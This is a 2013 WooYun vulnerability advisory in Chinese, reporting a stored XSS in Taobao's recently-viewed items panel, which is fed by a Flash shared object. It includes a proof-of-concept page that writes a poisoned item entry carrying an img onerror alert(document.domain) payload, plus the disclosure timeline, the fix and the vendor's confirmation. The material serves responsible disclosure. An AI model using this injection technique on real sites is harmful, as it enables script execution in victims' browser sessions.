当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022080

漏洞标题:淘宝某处存储型XSS漏洞

相关厂商:淘宝网

漏洞作者: p.z

提交时间:2013-04-18 16:00

修复时间:2013-06-02 16:01

公开时间:2013-06-02 16:01

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-18: 细节已通知厂商并且等待厂商处理中
2013-04-19: 厂商已经确认,细节仅向厂商公开
2013-04-29: 细节向核心白帽子及相关领域专家公开
2013-05-09: 细节向普通白帽子公开
2013-05-19: 细节向实习白帽子公开
2013-06-02: 细节向公众公开

简要描述:

未对输出进行过滤

详细说明:

http://list.taobao.com/itemlist/default.htm
搜索页中有一个最近浏览商品的栏目, 从flash的shared objcet中取出数据之间展现,为进行过滤,如果shared objcet存在恶意数据,会造成xss.

漏洞证明:

Q截图-20130418153557.png


tb.jpg


<script>
function updateLsoSaverStatus(status){
if(status == 2){
document['J_lsoSaver'].save('tb_recent_viewed_items','[{"itemId":"16023262435","pic":"i1%2FT1o4T0Xn4hXXbdPVbb_122616.jpg%22><img src=2 onerror=alert(document.domain)>","price":"15800","title":"%E9%A1%BA%E8%BE%BE%E9%93%B6%E9%B2%B8%E7%81%B5%E6%B6%A6%E9%AB%98%E5%8E%8B%E9%94%85%E5%A4%8D%E5%BA%95%E4%B8%8D%E9%94%88%E9%92%A2%E5%8E%8B%E5%8A%9B%E9%94%85%2024cm%20%E8%B6%85%E5%8E%9A%E9%AB%98%E5%8E%8B%E9%94%85SDF-9624","isDaily":false},{"url":"http%3A%2F%2Fitem.taobao.com%2Fitem.htm%3Fid%3D15621327776","itemId":"15621327776","xid":"","pic":"i2%2FT1q1iGXkpzXXbDQSTb_094946.jpg","price":"8900","itemIdStr":"15621327776","title":"%E4%B8%93%E6%9F%9C%E6%AD%A3%E5%93%81%20%E9%A1%BA%E8%BE%BE20CM%20%E7%BB%84%E5%90%88%E7%9B%96%E5%A4%8D%E5%BA%95%E6%97%A5%E5%BC%8F%E8%92%B8%E9%94%85SDF-8121%E4%B8%8D%E9%94%88%E9%92%A2%E8%92%B8%E7%85%AE%E9%94%85","isDaily":false}]')
}
}
</script>
Taobao xss poc
<object id="J_lsoSaver" tabindex="-1" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="http://a.tbcdn.cn/app/tbskip/lsoSaver.swf">
<param name="allowScriptAccess" value="always">
<embed name="J_lsoSaver" src="http://a.tbcdn.cn/app/tbskip/lsoSaver.swf" width="1" height="1" allowscriptaccess="always" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer">
</object>

修复方案:

输出过滤

版权声明:转载请注明来源 p.z@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2013-04-19 13:12

厂商回复:

感谢您对我们的关注与支持,该漏洞我们会尽快修复~~稍后会有礼物送出~~

最新状态:

暂无